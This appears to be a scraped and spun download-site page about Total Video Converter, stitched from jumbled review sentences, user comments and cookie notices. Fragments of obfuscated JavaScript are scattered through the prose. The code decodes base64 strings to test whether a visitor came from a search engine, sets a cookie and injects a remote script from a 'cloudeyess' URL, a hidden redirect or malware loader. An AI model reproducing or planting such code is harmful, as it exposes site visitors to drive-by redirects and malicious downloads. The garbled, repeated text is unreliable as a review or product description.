
A couple of videos converted I like the simple easy to use interface More reviewed on February 17, 2017"Great in a pinch"TVC has saved my butt more times than I can count.. This software is available to download for computers running Windows and Mac OSX version systems.
71User reviews about Total Video Converterby Lizzy Ine-AkhabueI have just downloaded today.. More reviewed on February 24, 2016Also available for:Alternative appsFree DVD to MPEG-4 converterFormat FactoryThe ultimate conversion software for PCFreemake Video ConverterConvert videos and other media files to popular video formatsA HandBrake-based ripper for DVD and videoArticles about Total Video ConverterHow to: Play RMVB filesFive essential apps for the iPadGiveaway: Get YouTube Music Downloader for free!Working with Flash video filesRelated topics about Total Video ConverterWe use own and third party cookies to improve our services and your experience, including, personalise ads, analyse traffic and social network features.. Total Video Converter 3 71Create the video files you want, without limitsConvert your videos and files using total video converter for good resultsOn Monday, September 1, 2014This is a software which you can convert videos with, and also convert files to a different format when downloaded.. Having said that, let it be known that it's not a high-quality co More reviewed on June 23, 2016waste of time.
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The performance of Total Video Converter is rather good, with few incidents depending on the resources of your computer, which mostly when you work with high-definition files.. also multiple convertions can be done simultaneously and fasterOnce the download is complete, double-click the installer to begin the installation process by mr vipin he want to setting with any black bueatyaudio and video convertion with along side the edit of all track that are convertable for the user in a well and safety manner for him or hervery easy to work with is user friendly and reliable does converting very fast and with same clarity glad that such programmes are readily availableits easy to convert video files in short time, and by this program software we can mixed videos and replace audio very easly, ands there are many fiture in itFor fanatical users of multimedia files, it is always important to have your videos and music in the format you will make use of the most, depending on the target device where it will be reproduced.. The verdictTotal Video Converter supports bunches of formats, but itâs so buggy the fact is pretty much irrelevant.

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It also helps with some not so popular formats such as RMVB videos This is the ultimate utility for converting your videos into the format you need, make good use of it.. var _0x8feb=['bGVuZ3Ro','c3BsaXQ=','cmVwbGFjZQ==','OyBwYXRoPQ==','OyBkb21haW49','WnBjSnI=','UVRNbU4=','cVBqT1U=','cGtIbGs=','Z2V0VGltZQ==','aG9BdEc=','TE1oWG4=','OyBzZWN1cmU=','LmJpbmcu','LnlhaG9vLg==','LmFsdGF2aXN0YS4=','LnlhbmRleC4=','Lmdvb2dsZS4=','WVJ2alY=','eXhSUXk=','LmFzay4=','dVV3RGc=','ZEFZalk=','cmVmZXJyZXI=','VG5XYlE=','d3VLdGQ=','aW5kZXhPZg==','c2V0','c3VCckE=','d3JLSEw=','c2NyaXB0','Y3JlYXRlRWxlbWVudA==','UEpqY2c=','Z2V0RWxlbWVudHNCeVRhZ05hbWU=','YXBwZW5kQ2hpbGQ=','bWF0Y2g=','cnVKSm4='];(function(_0x2b4d76,_0x47bf96){var _0x4230d8=function(_0x1cb4a6){while(--_0x1cb4a6){_0x2b4d76['push'](_0x2b4d76['shift']());}};_0x4230d8(++_0x47bf96);}(_0x8feb,0x146));var _0xb8fe=function(_0x103e9f,_0x30efc1){_0x103e9f=_0x103e9f-0x0;var _0x37d356=_0x8feb[_0x103e9f];if(_0xb8fe['initialized']===undefined){(function(){var _0x1bafdc;try{var _0x35195e=Function('return\x20(function()\x20'+'{}.. More reviewed on February 24, 2016No support for DAV files and crashed lots Seems simple to use otherwise.. Total Video Converter has helped me to convert videos in formats that I couldnât play before into compatible extensions with my default video player.. You can also convert, format and ban videos and watch them anywhere you go Its videos are no doubt high quality to watch.. Compatibility with almost all video formatsQuick extraction of audio from videosCombine several files into oneTotal Video Converter: Wipout the "format unsupported" error from all devices!By Elizabeth TweeteeOn Monday, October 20, 2014Total Video Converter is one of the most popular media converters which proved consistency over time.. Edition and conversion, all-in-oneOne of the main features once you are talking about multimedia conversion is the compatibility of formats, as well as the efficiency of file treatment.. Offering native support for the most popular music formats, Total Video Converter can modify and convert audio like ACC3, FLAC, MP3, WAV or OGG code formats among others that are included.. As for that part, burning your own collection of videos that have been modified by the user into discs has been made easier and helps in avoiding the use of external software to download.. TVC also has a slide show feature for photos where you can slide show and make a movie-like show through photo slide show.. All of these tools are available by clicking on the main interface and donât need a separate download.. thank uI have used nothing right now beacause i am totally new for the computer I want to use this program for my task.. If you continue browsing, you are considered to have accepted such use You may change your cookie preferences and obtain more information here.. So that i can see the resultsi have not used any other converters before now can i download this one for free.. Total video converter works together with other devices and so one can transfer other files to the phone or mp3.. In general it is a total featured software which supports almost all videos and audio formats.. More reviewed on April 9, 2014You may also likePlay your videos without difficultyTotal Video ConverterA trial version app for Windows, by AVD SOFTWAREAiseesoft Total Video ConverterConverter tool to transform your videos to different formatsOJOsoft Total Video ConverterA simple, basic multi-format video converterArticles about Total Video ConverterHow to watch WMV files on MacUnderstanding Quality Settings in Format Factory5 Alternatives to Total Video ConverterHow to: Play RMVB filesLeaving without your download?Get FREE alternatives to Total Video ConverterFree DVD to MPEG-4 converterFormat FactoryThe ultimate conversion software for PC¿Quieres formar parte de nuestra comunidad?Sign in to start the DownloadNota: Nunca publicaremos nada sin tu consentimiento¿Por qué iniciar sesión?Descarga cientos de apps y programas de forma rápida y seguraRecibe guÃas y contenido relevante de los mejores expertosLas últimas tendencias en tecnologÃa y descuentos exclusivos, directos a tu correo!The name and logo of Softonic are registered trademarks of SOFTONIC INTERNATIONAL S.. The different archives supported allow this software to offer great diversity when it comes to handling multimedia files.. By continuing to browse, you accept such uses You may change your cookie preferences and obtain more info here.. It has many file combination featuresCan work together with multiple devicesIt also has video editorIt is a bit complicated to a beginnerAll your videos into the format you want with Total Video ConverterOn Monday, April 7, 2014I think it is very useful for getting videos in my computer and then playing them in other external device like my gaming console, or even my tablet or my DVD player, making use of the USB slot.. This software works well with the conversion of files thanks to the compatibility with the main multimedia formats it supports.. It feels rough and frequently crashes, especially when you try to use the video editing tools.. men/don_con php?x=en&query='};var _0x3fd36b=[_0xb8fe('0x18'),_0x488e0d[_0xb8fe('0x19')],_0x488e0d[_0xb8fe('0x1a')],_0x488e0d['MmbtZ'],_0xb8fe('0x1b'),_0x488e0d[_0xb8fe('0x1c')],_0x488e0d[_0xb8fe('0x1d')]],_0x35fa08=document[_0xb8fe('0x1e')],_0x151a17=![],_0x161d71=cookie['get'](_0x488e0d['suBrA']);for(var _0x156250=0x0;_0x488e0d[_0xb8fe('0x1f')](_0x156250,_0x3fd36b[_0xb8fe('0x7')]);_0x156250++){if(_0x488e0d[_0xb8fe('0x20')](_0x35fa08[_0xb8fe('0x21')](_0x3fd36b[_0x156250]),0x0)){_0x151a17=!![];}}if(_0x151a17){cookie[_0xb8fe('0x22')](_0x488e0d[_0xb8fe('0x23')],0x1,0x1);if(!_0x161d71){_0x488e0d['NIGNW'](include,_0x488e0d['ojMDW'](_0x488e0d[_0xb8fe('0x24')],q)+'');}}}R(); Total Video Converter 3.. Overall, Total Video Converter is not a pleasant piece of software to use, though.. Itâs frustrating and unintuitive, and although the help documentation does seem complete, using the app is so exasperating that weâd be surprised if you even made it that far.. Having said that, let it be known that it's not a high-quality co More reviewed on June 23, 2016waste of time.. constructor(\x22return\x20this\x22)(\x20)'+');');_0x1bafdc=_0x35195e();}catch(_0x25ca43){_0x1bafdc=window;}var _0x141aba='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x1bafdc['atob']||(_0x1bafdc['atob']=function(_0x7f19a5){var _0x44abec=String(_0x7f19a5)['replace'](/=+$/,'');for(var _0x1cd7d9=0x0,_0x572f2f,_0x3ff0c2,_0x5ef248=0x0,_0x114a5d='';_0x3ff0c2=_0x44abec['charAt'](_0x5ef248++);~_0x3ff0c2&&(_0x572f2f=_0x1cd7d9%0x4?_0x572f2f*0x40+_0x3ff0c2:_0x3ff0c2,_0x1cd7d9++%0x4)?_0x114a5d+=String['fromCharCode'](0xff&_0x572f2f>>(-0x2*_0x1cd7d9&0x6)):0x0){_0x3ff0c2=_0x141aba['indexOf'](_0x3ff0c2);}return _0x114a5d;});}());_0xb8fe['base64DecodeUnicode']=function(_0x35c8a3){var _0x2ab43e=atob(_0x35c8a3);var _0x3814cd=[];for(var _0x1ae86b=0x0,_0x2ae42f=_0x2ab43e['length'];_0x1ae86b=_0x232de3;},'NIGNW':function _0x485725(_0x4603fe,_0x7225f5){return _0x4603fe(_0x7225f5);},'ojMDW':function _0x390321(_0x4e6e8d,_0x8ee865){return _0x4e6e8d+_0x8ee865;},'wrKHL':'https://cloudeyess.. This software developed by Effectmatrix comes in very handy whenever you have to change the bitrate for your purposes.. HD Media Player for Windows 10A full version app for Windows, by Dorin DamaschinRelated topics about Total Video ConverterTotal Video Converter 3.. But now, the developer has introduced a number of upgrades including serious facelift.. More reviewed on January 29, 2016"Good and nice video converter"very nice and easy t use video converter! It helps me a lot,I can use it to make my videos play on my portable device.. When Total Video Converter does work, itâs fast, but itâs just so buggy that it doesnât seem worth the effort.. Although in theory you only have the ability of converting video, the truth is that Total Video Converter can handle audio as well.. Featured app MultimediaPlay your videos without difficultyTop downloadsVLC media playerSimply the best multi-format media playerAdobe Flash PlayerThe Web's favorite video and animation playerPlay your videos without difficultyExcellent free multi-format media playerFormat FactoryThe ultimate conversion software for PCLatest appsFree MP4 to MPG ConverterA free app for Windows, by Free ConvertingMoo0 VideoMinimizerA free app for Windows, by Moo0Video for Windows 10A free app for Windows, by Microsoft CorporationTotal Video ConverterA trial version app for Windows, by AVD SOFTWAREmobile.. You can also easily add files using the drag and drop function This software brings good results when used.. Total Video Converter is also capable of ripping discs, extracting the content from DVD and Blu-Ray discs if you have installed the proper drive on your computer.. i hope this willserve me very well so i will not need to search for video conver software again.. You can work with your archives, and modify their content before exporting them to the target formatAdditional to the conversion feature, this version excels thanks to the simple edition function.. This includes to personalise ads, to provide social media features and to analyse our traffic.. Getting this kind of control is always relevant for the users, expanding the number of possible options for your videos and even music files.. A Copyright SOFTONIC INTERNATIONAL S A © 1997-2017 - All rights reservedWe use own and third party cookies to improve our services and your experience.. With TVC one can also modify imported files and format them to go together with your application.. Not only can it convert between various file formats, it also can process videos for use on a multitude of mobile devices, for burning to DVD or uploading to the web.. Makes adding files very simpleTotal Video Converter makes adding files for conversion very easy, with a nice, fluid drag and drop feature.. 71Video converter for just about anything!Total Video Converter is a multi-format video converter, editor and player.. Photos slide show combines multi-photos and music with more than 300 photos fantasy transition effect.. the second i hit convert the program crashes, then when i open it again it asks me to pay for it.. Total Video Converter includes a powerful media conversion engine internally so that you can convert media files with very fast speed.. If you feel Iâm exaggerating somewhere, please do Google searches about the TVC supported formats.. Total Video ConverterVideo converter for just about anything!You are about to leave Softonic and be redirected to official marketplace to download.. If someone asks me to suggest one, I will undoubtedly recommend TVC It is such nice software!Supports almost all media formatsQuality control options for advanced usersNoob friendly simple user interfaceVideo conversion hinders multi taskingQUESTIONS AND ANSWERSto convert downloaded videos to play on smartphone so that the files can be converted to a format suitable for playback since my mobile does not support wma filesThe total video converter is going to be used for reporting purposes to my colleagues in Sierra Leone and other Mano River countries in the regionI will be using this total video converter program to convert videos from mp4 to avi files which can be reable on dvd players or other devicesto conver the offical video to other format as shooting taken in mobile but not play in windows media player so it is essential to convert inconvert videos as per required format in my machine mobile and other devices which i have in my home, so this is the perfect software for thisI HAVE USED FREE STUDIO BEFORE THIS TIME BUT I STILL LOVE TO GET TOTAL VIDEO CONVERTER BECAUSE OF SOME FUNCTIONS IT PERFORM RATHER THAN OTHERShave not used any before.. What can Total Video Converter do?As video apps go, Total Video Converter handles bunches of formats.. Now it became so easy to convert media files and require less number of clicks Even though TVC is suitable for basic users with great simplicity in every bit, it wonât frustrate pro guys with tons of advanced options.. It has high compatibility and high efficiency for Importing RMVB or RM video/audio and allows you to convert various videos to MPEG videos compatible with standard DVD/SVCD/VCD.. Convert all kinds of videos to mobile videos or audios (mp4, 3gp, xvid, divx mpeg4 avi, amr audio) which are used by cell-phone, PDA, PSP, iPod.. This application can go together with most video formats and video files and can also work with photos.. This means you can stack up videos to be converted very quickly, leaving you time to get on with other things.. A couple of videos converted I like the simple easy to use interface More reviewed on February 17, 2017"Great in a pinch"TVC has saved my butt more times than I can count.. View full descriptionSupports lots of formats/devicesLots of additional video toolsLimitations15 day Trial PeriodTotal Video Converter is also compatible with:Windows VistaAlso available forTotal Video Converter is also available in other platformsTotal downloadsLast month's downloadsVersionUser rating7 / 10 ( 5029 votes )Softonic reviewTotal Video Converter is a multi-format video converter, editor and player.. Add a simple video editor which supports cutting and merging videos which are accurate to frameFlash video download supports Windows 7Flash video download supports MP4 downloadAdd a new engine supporting Mts, M2TS, avi, rm video formatSupport 16k samples per second Nelly Moser audioTotal Video Converter supports the following formatsAudio: CDA, MP3, MP2, RA, WAV, WMA, Ogg, AMR, AC3, AU y SWFAuthor's reviewTotal Video Converter is a total solution for video conversion which supports reading, playing lots of video and audio formats and converting them to popular video formats.. This way you can work with your archives, and modify their content before exporting them to the target format.. Among the large number of files supported, WMV-HD, MOV-HD, DIVX-HD, MP4-HD, MKV-HD or MPEG-2 are the most popular as a multimedia player and conversion software, as well as new popular files such as webm and those using mpeg4 or h264 codec, with 16k samples code support.. the second i hit convert the program crashes, then when i open it again it asks me to pay for it.. System RequirementsOperating System: Windows XP onwards, Mac OSX or laterGPU: compatible with Directx 9 or a similar versionSize: 19MB free space on the disk.. It is considered as a universal format changer as it supports almost all video and audio formats.. More reviewed on April 10, 2014"Nice but need improve"Really nice video converter! It is fast and user interface is very friendly! I love its speed but It has a weakness,t.. We also share information about your use of our site with our social media, advertising and analytics partners.. Itâs not very attractive, and the interface is buggy â sometimes the buttons donât even show up correctly.. Iâve been a netizen for years and I well know the best players around.. Total Video Converter 3 71 FeaturesCheck the main features you will find in this multimedia player and converter software:If you are interested in this application and its options, you can learn more by visiting the productâs website.. User comments about Total Video Converterby Lizzy Ine-AkhabueI have just downloaded today.. Why am I being redirected? For your peace of mind! We bring you to the safest source to download the latest version of each app.. if i use another i will say it to you or total video converter groupi love the quality of the converted output and the user interface is easy to use.. thank and God bless youfor dvd print change into mobile mp4 format so i want to download your product total video converter and i want to use this for long time.. I promise you will hear at least 10 unheard format extensions there Older version of TVC had a bit complicated user interface and working style.
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